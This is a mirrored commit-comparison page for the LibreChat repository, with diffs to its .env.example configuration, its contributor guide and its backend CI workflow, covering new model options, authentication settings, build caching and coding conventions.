mirror of
https://github.com/danny-avila/LibreChat.git
synced 2026-03-16 20:56:35 +01:00
Compare commits
131 commits
chart-1.9.
...
main
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
8271055c2d | ||
|
|
acd07e8085 | ||
|
|
8e8fb01d18 | ||
|
|
6f87b49df8 | ||
|
|
a26eeea592 | ||
|
|
aee1ced817 | ||
|
|
ad08df4db6 | ||
|
|
f7ab5e645a | ||
|
|
f9927f0168 | ||
|
|
bcf45519bd | ||
|
|
1312cd757c | ||
|
|
8dc6d60750 | ||
|
|
07d0ce4ce9 | ||
|
|
a0b4949a05 | ||
|
|
a01959b3d2 | ||
|
|
e079fc4900 | ||
|
|
93a628d7a2 | ||
|
|
0c27ad2d55 | ||
|
|
7c39a45944 | ||
|
|
8318446704 | ||
|
|
7bc793b18d | ||
|
|
cbdc6f6060 | ||
|
|
f67bbb2bc5 | ||
|
|
35a35dc2e9 | ||
|
|
c6982dc180 | ||
|
|
71a3b48504 | ||
|
|
189cdf581d | ||
|
|
ca79a03135 | ||
|
|
fa9e1b228a | ||
|
|
f32907cd36 | ||
|
|
65b0bfde1b | ||
|
|
3ddf62c8e5 | ||
|
|
fc6f7a337d | ||
|
|
9a5d7eaa4e | ||
|
|
fcb344da47 | ||
|
|
6167ce6e57 | ||
|
|
c0e876a2e6 | ||
|
|
eb6328c1d9 | ||
|
|
ad5c51f62b | ||
|
|
cfbe812d63 | ||
|
|
9cf389715a | ||
|
|
873f446f8e | ||
|
|
32cadb1cc5 | ||
|
|
8b18a16446 | ||
|
|
4a8a5b5994 | ||
|
|
2ac62a2e71 | ||
|
|
cfaa6337c1 | ||
|
|
b93d60c416 | ||
|
|
6d0938be64 | ||
|
|
cc3d62c640 | ||
|
|
3a73907daa | ||
|
|
771227ecf9 | ||
|
|
a79f7cebd5 | ||
|
|
3b84cc048a | ||
|
|
5209f1dc9e | ||
|
|
c324a8d9e4 | ||
|
|
d74a62ecd5 | ||
|
|
9956a72694 | ||
|
|
afb35103f1 | ||
|
|
0ef369af9b | ||
|
|
956f8fb6f0 | ||
|
|
c6dba9f0a1 | ||
|
|
7e85cf71bd | ||
|
|
490ad30427 | ||
|
|
a0bcb44b8f | ||
|
|
f1eabdbdb7 | ||
|
|
6ebee069c7 | ||
|
|
4af23474e2 | ||
|
|
6394982f5a | ||
|
|
14bcab60b3 | ||
|
|
d3622844ad | ||
|
|
474001c140 | ||
|
|
d3c06052d7 | ||
|
|
a2a09b556a | ||
|
|
3e487df193 | ||
|
|
2f2a259c4e | ||
|
|
619d35360d | ||
|
|
23237255d8 | ||
|
|
b1771e0a6e | ||
|
|
7c71875da3 | ||
|
|
9b3152807b | ||
|
|
93560f5f5b | ||
|
|
b18915a96b | ||
|
|
c0236b4ba7 | ||
|
|
8f7579c2f5 | ||
|
|
8130db577f | ||
|
|
f7ac449ca4 | ||
|
|
2a5123bfa1 | ||
|
|
a0a1749151 | ||
|
|
36e37003c9 | ||
|
|
1f82fb8692 | ||
|
|
5be90706b0 | ||
|
|
ce1338285c | ||
|
|
e1e204d6cf | ||
|
|
0e5ee379b3 | ||
|
|
723acd830c | ||
|
|
826b494578 | ||
|
|
e6b324b259 | ||
|
|
cde5079886 | ||
|
|
43ff3f8473 | ||
|
|
8b159079f5 | ||
|
|
6169d4f70b | ||
|
|
a17a38b8ed | ||
|
|
b01f3ccada | ||
|
|
09d5b1a739 | ||
|
|
0568f1c1eb | ||
|
|
046e92217f | ||
|
|
3a079b980a | ||
|
|
13df8ed67c | ||
|
|
e978a934fc | ||
|
|
a0f9782e60 | ||
|
|
59bd27b4f4 | ||
|
|
4080e914e2 | ||
|
|
9a8a5d66d7 | ||
|
|
44dbbd5328 | ||
|
|
8c3c326440 | ||
|
|
3d7e26382e | ||
|
|
f3eb197675 | ||
|
|
1d0a4c501f | ||
|
|
b349f2f876 | ||
|
|
7ce898d6a0 | ||
|
|
7692fa837e | ||
|
|
b7bfdfa8b2 | ||
|
|
cca9d63224 | ||
|
|
4404319e22 | ||
|
|
e92061671b | ||
|
|
5d2b7fa4d5 | ||
|
|
59717f5f50 | ||
|
|
7a1d2969b8 | ||
|
|
a103ce72b4 | ||
|
|
c3da148fa0 |
474 changed files with 45475 additions and 12413 deletions
41
.env.example
41
.env.example
|
|
@ -65,6 +65,9 @@ CONSOLE_JSON=false
|
||||||
DEBUG_LOGGING=true
|
DEBUG_LOGGING=true
|
||||||
DEBUG_CONSOLE=false
|
DEBUG_CONSOLE=false
|
||||||
|
|
||||||
|
# Enable memory diagnostics (logs heap/RSS snapshots every 60s, auto-enabled with --inspect)
|
||||||
|
# MEM_DIAG=true
|
||||||
|
|
||||||
#=============#
|
#=============#
|
||||||
# Permissions #
|
# Permissions #
|
||||||
#=============#
|
#=============#
|
||||||
|
|
@ -193,10 +196,10 @@ GOOGLE_KEY=user_provided
|
||||||
# GOOGLE_AUTH_HEADER=true
|
# GOOGLE_AUTH_HEADER=true
|
||||||
|
|
||||||
# Gemini API (AI Studio)
|
# Gemini API (AI Studio)
|
||||||
# GOOGLE_MODELS=gemini-2.5-pro,gemini-2.5-flash,gemini-2.5-flash-lite,gemini-2.0-flash,gemini-2.0-flash-lite
|
# GOOGLE_MODELS=gemini-3.1-pro-preview,gemini-3.1-pro-preview-customtools,gemini-3.1-flash-lite-preview,gemini-2.5-pro,gemini-2.5-flash,gemini-2.5-flash-lite,gemini-2.0-flash,gemini-2.0-flash-lite
|
||||||
|
|
||||||
# Vertex AI
|
# Vertex AI
|
||||||
# GOOGLE_MODELS=gemini-2.5-pro,gemini-2.5-flash,gemini-2.5-flash-lite,gemini-2.0-flash-001,gemini-2.0-flash-lite-001
|
# GOOGLE_MODELS=gemini-3.1-pro-preview,gemini-3.1-pro-preview-customtools,gemini-3.1-flash-lite-preview,gemini-2.5-pro,gemini-2.5-flash,gemini-2.5-flash-lite,gemini-2.0-flash-001,gemini-2.0-flash-lite-001
|
||||||
|
|
||||||
# GOOGLE_TITLE_MODEL=gemini-2.0-flash-lite-001
|
# GOOGLE_TITLE_MODEL=gemini-2.0-flash-lite-001
|
||||||
|
|
||||||
|
|
@ -243,10 +246,6 @@ GOOGLE_KEY=user_provided
|
||||||
# Option A: Use dedicated Gemini API key for image generation
|
# Option A: Use dedicated Gemini API key for image generation
|
||||||
# GEMINI_API_KEY=your-gemini-api-key
|
# GEMINI_API_KEY=your-gemini-api-key
|
||||||
|
|
||||||
# Option B: Use Vertex AI (no API key needed, uses service account)
|
|
||||||
# Set this to enable Vertex AI and allow tool without requiring API keys
|
|
||||||
# GEMINI_VERTEX_ENABLED=true
|
|
||||||
|
|
||||||
# Vertex AI model for image generation (defaults to gemini-2.5-flash-image)
|
# Vertex AI model for image generation (defaults to gemini-2.5-flash-image)
|
||||||
# GEMINI_IMAGE_MODEL=gemini-2.5-flash-image
|
# GEMINI_IMAGE_MODEL=gemini-2.5-flash-image
|
||||||
|
|
||||||
|
|
@ -514,6 +513,9 @@ OPENID_ADMIN_ROLE_TOKEN_KIND=
|
||||||
OPENID_USERNAME_CLAIM=
|
OPENID_USERNAME_CLAIM=
|
||||||
# Set to determine which user info property returned from OpenID Provider to store as the User's name
|
# Set to determine which user info property returned from OpenID Provider to store as the User's name
|
||||||
OPENID_NAME_CLAIM=
|
OPENID_NAME_CLAIM=
|
||||||
|
# Set to determine which user info claim to use as the email/identifier for user matching (e.g., "upn" for Entra ID)
|
||||||
|
# When not set, defaults to: email -> preferred_username -> upn
|
||||||
|
OPENID_EMAIL_CLAIM=
|
||||||
# Optional audience parameter for OpenID authorization requests
|
# Optional audience parameter for OpenID authorization requests
|
||||||
OPENID_AUDIENCE=
|
OPENID_AUDIENCE=
|
||||||
|
|
||||||
|
|
@ -658,6 +660,9 @@ AWS_ACCESS_KEY_ID=
|
||||||
AWS_SECRET_ACCESS_KEY=
|
AWS_SECRET_ACCESS_KEY=
|
||||||
AWS_REGION=
|
AWS_REGION=
|
||||||
AWS_BUCKET_NAME=
|
AWS_BUCKET_NAME=
|
||||||
|
# Required for path-style S3-compatible providers (MinIO, Hetzner, Backblaze B2, etc.)
|
||||||
|
# that don't support virtual-hosted-style URLs (bucket.endpoint). Not needed for AWS S3.
|
||||||
|
# AWS_FORCE_PATH_STYLE=false
|
||||||
|
|
||||||
#========================#
|
#========================#
|
||||||
# Azure Blob Storage #
|
# Azure Blob Storage #
|
||||||
|
|
@ -672,7 +677,8 @@ AZURE_CONTAINER_NAME=files
|
||||||
#========================#
|
#========================#
|
||||||
|
|
||||||
ALLOW_SHARED_LINKS=true
|
ALLOW_SHARED_LINKS=true
|
||||||
ALLOW_SHARED_LINKS_PUBLIC=true
|
# Allows unauthenticated access to shared links. Defaults to false (auth required) if not set.
|
||||||
|
ALLOW_SHARED_LINKS_PUBLIC=false
|
||||||
|
|
||||||
#==============================#
|
#==============================#
|
||||||
# Static File Cache Control #
|
# Static File Cache Control #
|
||||||
|
|
@ -844,3 +850,24 @@ OPENWEATHER_API_KEY=
|
||||||
# Skip code challenge method validation (e.g., for AWS Cognito that supports S256 but doesn't advertise it)
|
# Skip code challenge method validation (e.g., for AWS Cognito that supports S256 but doesn't advertise it)
|
||||||
# When set to true, forces S256 code challenge even if not advertised in .well-known/openid-configuration
|
# When set to true, forces S256 code challenge even if not advertised in .well-known/openid-configuration
|
||||||
# MCP_SKIP_CODE_CHALLENGE_CHECK=false
|
# MCP_SKIP_CODE_CHALLENGE_CHECK=false
|
||||||
|
|
||||||
|
# Circuit breaker: max connect/disconnect cycles before tripping (per server)
|
||||||
|
# MCP_CB_MAX_CYCLES=7
|
||||||
|
|
||||||
|
# Circuit breaker: sliding window (ms) for counting cycles
|
||||||
|
# MCP_CB_CYCLE_WINDOW_MS=45000
|
||||||
|
|
||||||
|
# Circuit breaker: cooldown (ms) after the cycle breaker trips
|
||||||
|
# MCP_CB_CYCLE_COOLDOWN_MS=15000
|
||||||
|
|
||||||
|
# Circuit breaker: max consecutive failed connection rounds before backoff
|
||||||
|
# MCP_CB_MAX_FAILED_ROUNDS=3
|
||||||
|
|
||||||
|
# Circuit breaker: sliding window (ms) for counting failed rounds
|
||||||
|
# MCP_CB_FAILED_WINDOW_MS=120000
|
||||||
|
|
||||||
|
# Circuit breaker: base backoff (ms) after failed round threshold is reached
|
||||||
|
# MCP_CB_BASE_BACKOFF_MS=30000
|
||||||
|
|
||||||
|
# Circuit breaker: max backoff cap (ms) for exponential backoff
|
||||||
|
# MCP_CB_MAX_BACKOFF_MS=300000
|
||||||
|
|
|
||||||
75
.github/CONTRIBUTING.md
vendored
75
.github/CONTRIBUTING.md
vendored
|
|
@ -26,18 +26,14 @@ Project maintainers have the right and responsibility to remove, edit, or reject
|
||||||
|
|
||||||
## 1. Development Setup
|
## 1. Development Setup
|
||||||
|
|
||||||
1. Use Node.JS 20.x.
|
1. Use Node.js v20.19.0+ or ^22.12.0 or >= 23.0.0.
|
||||||
2. Install typescript globally: `npm i -g typescript`.
|
2. Run `npm run smart-reinstall` to install dependencies (uses Turborepo). Use `npm run reinstall` for a clean install, or `npm ci` for a fresh lockfile-based install.
|
||||||
3. Run `npm ci` to install dependencies.
|
3. Build all compiled code: `npm run build`.
|
||||||
4. Build the data provider: `npm run build:data-provider`.
|
4. Setup and run unit tests:
|
||||||
5. Build data schemas: `npm run build:data-schemas`.
|
|
||||||
6. Build API methods: `npm run build:api`.
|
|
||||||
7. Setup and run unit tests:
|
|
||||||
- Copy `.env.test`: `cp api/test/.env.test.example api/test/.env.test`.
|
- Copy `.env.test`: `cp api/test/.env.test.example api/test/.env.test`.
|
||||||
- Run backend unit tests: `npm run test:api`.
|
- Run backend unit tests: `npm run test:api`.
|
||||||
- Run frontend unit tests: `npm run test:client`.
|
- Run frontend unit tests: `npm run test:client`.
|
||||||
8. Setup and run integration tests:
|
5. Setup and run integration tests:
|
||||||
- Build client: `cd client && npm run build`.
|
|
||||||
- Create `.env`: `cp .env.example .env`.
|
- Create `.env`: `cp .env.example .env`.
|
||||||
- Install [MongoDB Community Edition](https://www.mongodb.com/docs/manual/administration/install-community/), ensure that `mongosh` connects to your local instance.
|
- Install [MongoDB Community Edition](https://www.mongodb.com/docs/manual/administration/install-community/), ensure that `mongosh` connects to your local instance.
|
||||||
- Run: `npx install playwright`, then `npx playwright install`.
|
- Run: `npx install playwright`, then `npx playwright install`.
|
||||||
|
|
@ -48,11 +44,11 @@ Project maintainers have the right and responsibility to remove, edit, or reject
|
||||||
## 2. Development Notes
|
## 2. Development Notes
|
||||||
|
|
||||||
1. Before starting work, make sure your main branch has the latest commits with `npm run update`.
|
1. Before starting work, make sure your main branch has the latest commits with `npm run update`.
|
||||||
3. Run linting command to find errors: `npm run lint`. Alternatively, ensure husky pre-commit checks are functioning.
|
2. Run linting command to find errors: `npm run lint`. Alternatively, ensure husky pre-commit checks are functioning.
|
||||||
3. After your changes, reinstall packages in your current branch using `npm run reinstall` and ensure everything still works.
|
3. After your changes, reinstall packages in your current branch using `npm run reinstall` and ensure everything still works.
|
||||||
- Restart the ESLint server ("ESLint: Restart ESLint Server" in VS Code command bar) and your IDE after reinstalling or updating.
|
- Restart the ESLint server ("ESLint: Restart ESLint Server" in VS Code command bar) and your IDE after reinstalling or updating.
|
||||||
4. Clear web app localStorage and cookies before and after changes.
|
4. Clear web app localStorage and cookies before and after changes.
|
||||||
5. For frontend changes, compile typescript before and after changes to check for introduced errors: `cd client && npm run build`.
|
5. To check for introduced errors, build all compiled code: `npm run build`.
|
||||||
6. Run backend unit tests: `npm run test:api`.
|
6. Run backend unit tests: `npm run test:api`.
|
||||||
7. Run frontend unit tests: `npm run test:client`.
|
7. Run frontend unit tests: `npm run test:client`.
|
||||||
8. Run integration tests: `npm run e2e`.
|
8. Run integration tests: `npm run e2e`.
|
||||||
|
|
@ -118,50 +114,45 @@ Apply the following naming conventions to branches, labels, and other Git-relate
|
||||||
- **JS/TS:** Directories and file names: Descriptive and camelCase. First letter uppercased for React files (e.g., `helperFunction.ts, ReactComponent.tsx`).
|
- **JS/TS:** Directories and file names: Descriptive and camelCase. First letter uppercased for React files (e.g., `helperFunction.ts, ReactComponent.tsx`).
|
||||||
- **Docs:** Directories and file names: Descriptive and snake_case (e.g., `config_files.md`).
|
- **Docs:** Directories and file names: Descriptive and snake_case (e.g., `config_files.md`).
|
||||||
|
|
||||||
## 7. TypeScript Conversion
|
## 7. Coding Standards
|
||||||
|
|
||||||
|
For detailed coding conventions, workspace boundaries, and architecture guidance, refer to the [`AGENTS.md`](../AGENTS.md) file at the project root. It covers code style, type safety, import ordering, iteration/performance expectations, frontend rules, testing, and development commands.
|
||||||
|
|
||||||
|
## 8. TypeScript Conversion
|
||||||
|
|
||||||
1. **Original State**: The project was initially developed entirely in JavaScript (JS).
|
1. **Original State**: The project was initially developed entirely in JavaScript (JS).
|
||||||
|
|
||||||
2. **Frontend Transition**:
|
2. **Frontend**: Fully transitioned to TypeScript.
|
||||||
- We are in the process of transitioning the frontend from JS to TypeScript (TS).
|
|
||||||
- The transition is nearing completion.
|
|
||||||
- This conversion is feasible due to React's capability to intermix JS and TS prior to code compilation. It's standard practice to compile/bundle the code in such scenarios.
|
|
||||||
|
|
||||||
3. **Backend Considerations**:
|
3. **Backend**:
|
||||||
- Transitioning the backend to TypeScript would be a more intricate process, especially for an established Express.js server.
|
- The legacy Express.js server remains in `/api` as JavaScript.
|
||||||
|
- All new backend code is written in TypeScript under `/packages/api`, which is compiled and consumed by `/api`.
|
||||||
|
- Shared database logic lives in `/packages/data-schemas` (TypeScript).
|
||||||
|
- Shared frontend/backend API types and services live in `/packages/data-provider` (TypeScript).
|
||||||
|
- Minimize direct changes to `/api`; prefer adding TypeScript code to `/packages/api` and importing it.
|
||||||
|
|
||||||
- **Options for Transition**:
|
## 9. Module Import Conventions
|
||||||
- **Single Phase Overhaul**: This involves converting the entire backend to TypeScript in one go. It's the most straightforward approach but can be disruptive, especially for larger codebases.
|
|
||||||
|
|
||||||
- **Incremental Transition**: Convert parts of the backend progressively. This can be done by:
|
Imports are organized into three sections (in order):
|
||||||
- Maintaining a separate directory for TypeScript files.
|
|
||||||
- Gradually migrating and testing individual modules or routes.
|
|
||||||
- Using a build tool like `tsc` to compile TypeScript files independently until the entire transition is complete.
|
|
||||||
|
|
||||||
- **Compilation Considerations**:
|
1. **Package imports** — sorted from shortest to longest line length.
|
||||||
- Introducing a compilation step for the server is an option. This would involve using tools like `ts-node` for development and `tsc` for production builds.
|
- `react` is always the first import.
|
||||||
- However, this is not a conventional approach for Express.js servers and could introduce added complexity, especially in terms of build and deployment processes.
|
- Multi-line (stacked) imports count their total character length across all lines for sorting.
|
||||||
|
|
||||||
- **Current Stance**: At present, this backend transition is of lower priority and might not be pursued.
|
2. **`import type` imports** — sorted from longest to shortest line length.
|
||||||
|
- Package type imports come first, then local type imports.
|
||||||
|
- Line length sorting resets between the package and local sub-groups.
|
||||||
|
|
||||||
## 8. Module Import Conventions
|
3. **Local/project imports** — sorted from longest to shortest line length.
|
||||||
|
- Multi-line (stacked) imports count their total character length across all lines for sorting.
|
||||||
|
- Imports with alias `~` are treated the same as relative imports with respect to line length.
|
||||||
|
|
||||||
- `npm` packages first,
|
- Consolidate value imports from the same module as much as possible.
|
||||||
- from longest line (top) to shortest (bottom)
|
- Always use standalone `import type { ... }` for type imports; never use inline `type` keyword inside value imports (e.g., `import { Foo, type Bar }` is wrong).
|
||||||
|
|
||||||
- Followed by typescript types (pertains to data-provider and client workspaces)
|
|
||||||
- longest line (top) to shortest (bottom)
|
|
||||||
- types from package come first
|
|
||||||
|
|
||||||
- Lastly, local imports
|
|
||||||
- longest line (top) to shortest (bottom)
|
|
||||||
- imports with alias `~` treated the same as relative import with respect to line length
|
|
||||||
|
|
||||||
**Note:** ESLint will automatically enforce these import conventions when you run `npm run lint --fix` or through pre-commit hooks.
|
**Note:** ESLint will automatically enforce these import conventions when you run `npm run lint --fix` or through pre-commit hooks.
|
||||||
|
|
||||||
---
|
For the full set of coding standards, see [`AGENTS.md`](../AGENTS.md).
|
||||||
|
|
||||||
Please ensure that you adapt this summary to fit the specific context and nuances of your project.
|
|
||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
|
|
|
||||||
335
.github/workflows/backend-review.yml
vendored
335
.github/workflows/backend-review.yml
vendored
|
|
@ -9,48 +9,145 @@ on:
|
||||||
paths:
|
paths:
|
||||||
- 'api/**'
|
- 'api/**'
|
||||||
- 'packages/**'
|
- 'packages/**'
|
||||||
jobs:
|
|
||||||
tests_Backend:
|
|
||||||
name: Run Backend unit tests
|
|
||||||
timeout-minutes: 60
|
|
||||||
runs-on: ubuntu-latest
|
|
||||||
env:
|
env:
|
||||||
MONGO_URI: ${{ secrets.MONGO_URI }}
|
|
||||||
OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
|
|
||||||
JWT_SECRET: ${{ secrets.JWT_SECRET }}
|
|
||||||
CREDS_KEY: ${{ secrets.CREDS_KEY }}
|
|
||||||
CREDS_IV: ${{ secrets.CREDS_IV }}
|
|
||||||
BAN_VIOLATIONS: ${{ secrets.BAN_VIOLATIONS }}
|
|
||||||
BAN_DURATION: ${{ secrets.BAN_DURATION }}
|
|
||||||
BAN_INTERVAL: ${{ secrets.BAN_INTERVAL }}
|
|
||||||
NODE_ENV: CI
|
NODE_ENV: CI
|
||||||
NODE_OPTIONS: '--max-old-space-size=${{ secrets.NODE_MAX_OLD_SPACE_SIZE || 6144 }}'
|
NODE_OPTIONS: '--max-old-space-size=${{ secrets.NODE_MAX_OLD_SPACE_SIZE || 6144 }}'
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
name: Build packages
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
timeout-minutes: 15
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@v4
|
- uses: actions/checkout@v4
|
||||||
- name: Use Node.js 20.x
|
|
||||||
|
- name: Use Node.js 20.19
|
||||||
uses: actions/setup-node@v4
|
uses: actions/setup-node@v4
|
||||||
with:
|
with:
|
||||||
node-version: 20
|
node-version: '20.19'
|
||||||
cache: 'npm'
|
|
||||||
|
- name: Restore node_modules cache
|
||||||
|
id: cache-node-modules
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: |
|
||||||
|
node_modules
|
||||||
|
api/node_modules
|
||||||
|
packages/api/node_modules
|
||||||
|
packages/data-provider/node_modules
|
||||||
|
packages/data-schemas/node_modules
|
||||||
|
key: node-modules-backend-${{ runner.os }}-20.19-${{ hashFiles('package-lock.json') }}
|
||||||
|
|
||||||
- name: Install dependencies
|
- name: Install dependencies
|
||||||
|
if: steps.cache-node-modules.outputs.cache-hit != 'true'
|
||||||
run: npm ci
|
run: npm ci
|
||||||
|
|
||||||
- name: Install Data Provider Package
|
- name: Restore data-provider build cache
|
||||||
|
id: cache-data-provider
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
key: build-data-provider-${{ runner.os }}-${{ hashFiles('packages/data-provider/src/**', 'packages/data-provider/tsconfig*.json', 'packages/data-provider/rollup.config.js', 'packages/data-provider/package.json') }}
|
||||||
|
|
||||||
|
- name: Build data-provider
|
||||||
|
if: steps.cache-data-provider.outputs.cache-hit != 'true'
|
||||||
run: npm run build:data-provider
|
run: npm run build:data-provider
|
||||||
|
|
||||||
- name: Install Data Schemas Package
|
- name: Restore data-schemas build cache
|
||||||
|
id: cache-data-schemas
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: packages/data-schemas/dist
|
||||||
|
key: build-data-schemas-${{ runner.os }}-${{ hashFiles('packages/data-schemas/src/**', 'packages/data-schemas/tsconfig*.json', 'packages/data-schemas/rollup.config.js', 'packages/data-schemas/package.json', 'packages/data-provider/src/**', 'packages/data-provider/tsconfig*.json', 'packages/data-provider/rollup.config.js', 'packages/data-provider/package.json') }}
|
||||||
|
|
||||||
|
- name: Build data-schemas
|
||||||
|
if: steps.cache-data-schemas.outputs.cache-hit != 'true'
|
||||||
run: npm run build:data-schemas
|
run: npm run build:data-schemas
|
||||||
|
|
||||||
- name: Install API Package
|
- name: Restore api build cache
|
||||||
|
id: cache-api
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: packages/api/dist
|
||||||
|
key: build-api-${{ runner.os }}-${{ hashFiles('packages/api/src/**', 'packages/api/tsconfig*.json', 'packages/api/server-rollup.config.js', 'packages/api/package.json', 'packages/data-provider/src/**', 'packages/data-provider/tsconfig*.json', 'packages/data-provider/rollup.config.js', 'packages/data-provider/package.json', 'packages/data-schemas/src/**', 'packages/data-schemas/tsconfig*.json', 'packages/data-schemas/rollup.config.js', 'packages/data-schemas/package.json') }}
|
||||||
|
|
||||||
|
- name: Build api
|
||||||
|
if: steps.cache-api.outputs.cache-hit != 'true'
|
||||||
run: npm run build:api
|
run: npm run build:api
|
||||||
|
|
||||||
- name: Create empty auth.json file
|
- name: Upload data-provider build
|
||||||
run: |
|
uses: actions/upload-artifact@v4
|
||||||
mkdir -p api/data
|
with:
|
||||||
echo '{}' > api/data/auth.json
|
name: build-data-provider
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
retention-days: 2
|
||||||
|
|
||||||
- name: Check for Circular dependency in rollup
|
- name: Upload data-schemas build
|
||||||
|
uses: actions/upload-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-schemas
|
||||||
|
path: packages/data-schemas/dist
|
||||||
|
retention-days: 2
|
||||||
|
|
||||||
|
- name: Upload api build
|
||||||
|
uses: actions/upload-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-api
|
||||||
|
path: packages/api/dist
|
||||||
|
retention-days: 2
|
||||||
|
|
||||||
|
circular-deps:
|
||||||
|
name: Circular dependency checks
|
||||||
|
needs: build
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
timeout-minutes: 10
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
|
||||||
|
- name: Use Node.js 20.19
|
||||||
|
uses: actions/setup-node@v4
|
||||||
|
with:
|
||||||
|
node-version: '20.19'
|
||||||
|
|
||||||
|
- name: Restore node_modules cache
|
||||||
|
id: cache-node-modules
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: |
|
||||||
|
node_modules
|
||||||
|
api/node_modules
|
||||||
|
packages/api/node_modules
|
||||||
|
packages/data-provider/node_modules
|
||||||
|
packages/data-schemas/node_modules
|
||||||
|
key: node-modules-backend-${{ runner.os }}-20.19-${{ hashFiles('package-lock.json') }}
|
||||||
|
|
||||||
|
- name: Install dependencies
|
||||||
|
if: steps.cache-node-modules.outputs.cache-hit != 'true'
|
||||||
|
run: npm ci
|
||||||
|
|
||||||
|
- name: Download data-provider build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-provider
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
|
||||||
|
- name: Download data-schemas build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-schemas
|
||||||
|
path: packages/data-schemas/dist
|
||||||
|
|
||||||
|
- name: Rebuild @librechat/api and check for circular dependencies
|
||||||
|
run: |
|
||||||
|
output=$(npm run build:api 2>&1)
|
||||||
|
echo "$output"
|
||||||
|
if echo "$output" | grep -q "Circular depend"; then
|
||||||
|
echo "Error: Circular dependency detected in @librechat/api!"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
- name: Detect circular dependencies in rollup
|
||||||
working-directory: ./packages/data-provider
|
working-directory: ./packages/data-provider
|
||||||
run: |
|
run: |
|
||||||
output=$(npm run rollup:api)
|
output=$(npm run rollup:api)
|
||||||
|
|
@ -60,17 +157,201 @@ jobs:
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
test-api:
|
||||||
|
name: 'Tests: api'
|
||||||
|
needs: build
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
timeout-minutes: 15
|
||||||
|
env:
|
||||||
|
MONGO_URI: ${{ secrets.MONGO_URI }}
|
||||||
|
OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
|
||||||
|
JWT_SECRET: ${{ secrets.JWT_SECRET }}
|
||||||
|
CREDS_KEY: ${{ secrets.CREDS_KEY }}
|
||||||
|
CREDS_IV: ${{ secrets.CREDS_IV }}
|
||||||
|
BAN_VIOLATIONS: ${{ secrets.BAN_VIOLATIONS }}
|
||||||
|
BAN_DURATION: ${{ secrets.BAN_DURATION }}
|
||||||
|
BAN_INTERVAL: ${{ secrets.BAN_INTERVAL }}
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
|
||||||
|
- name: Use Node.js 20.19
|
||||||
|
uses: actions/setup-node@v4
|
||||||
|
with:
|
||||||
|
node-version: '20.19'
|
||||||
|
|
||||||
|
- name: Restore node_modules cache
|
||||||
|
id: cache-node-modules
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: |
|
||||||
|
node_modules
|
||||||
|
api/node_modules
|
||||||
|
packages/api/node_modules
|
||||||
|
packages/data-provider/node_modules
|
||||||
|
packages/data-schemas/node_modules
|
||||||
|
key: node-modules-backend-${{ runner.os }}-20.19-${{ hashFiles('package-lock.json') }}
|
||||||
|
|
||||||
|
- name: Install dependencies
|
||||||
|
if: steps.cache-node-modules.outputs.cache-hit != 'true'
|
||||||
|
run: npm ci
|
||||||
|
|
||||||
|
- name: Download data-provider build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-provider
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
|
||||||
|
- name: Download data-schemas build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-schemas
|
||||||
|
path: packages/data-schemas/dist
|
||||||
|
|
||||||
|
- name: Download api build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-api
|
||||||
|
path: packages/api/dist
|
||||||
|
|
||||||
|
- name: Create empty auth.json file
|
||||||
|
run: |
|
||||||
|
mkdir -p api/data
|
||||||
|
echo '{}' > api/data/auth.json
|
||||||
|
|
||||||
- name: Prepare .env.test file
|
- name: Prepare .env.test file
|
||||||
run: cp api/test/.env.test.example api/test/.env.test
|
run: cp api/test/.env.test.example api/test/.env.test
|
||||||
|
|
||||||
- name: Run unit tests
|
- name: Run unit tests
|
||||||
run: cd api && npm run test:ci
|
run: cd api && npm run test:ci
|
||||||
|
|
||||||
- name: Run librechat-data-provider unit tests
|
test-data-provider:
|
||||||
|
name: 'Tests: data-provider'
|
||||||
|
needs: build
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
timeout-minutes: 10
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
|
||||||
|
- name: Use Node.js 20.19
|
||||||
|
uses: actions/setup-node@v4
|
||||||
|
with:
|
||||||
|
node-version: '20.19'
|
||||||
|
|
||||||
|
- name: Restore node_modules cache
|
||||||
|
id: cache-node-modules
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: |
|
||||||
|
node_modules
|
||||||
|
api/node_modules
|
||||||
|
packages/api/node_modules
|
||||||
|
packages/data-provider/node_modules
|
||||||
|
packages/data-schemas/node_modules
|
||||||
|
key: node-modules-backend-${{ runner.os }}-20.19-${{ hashFiles('package-lock.json') }}
|
||||||
|
|
||||||
|
- name: Install dependencies
|
||||||
|
if: steps.cache-node-modules.outputs.cache-hit != 'true'
|
||||||
|
run: npm ci
|
||||||
|
|
||||||
|
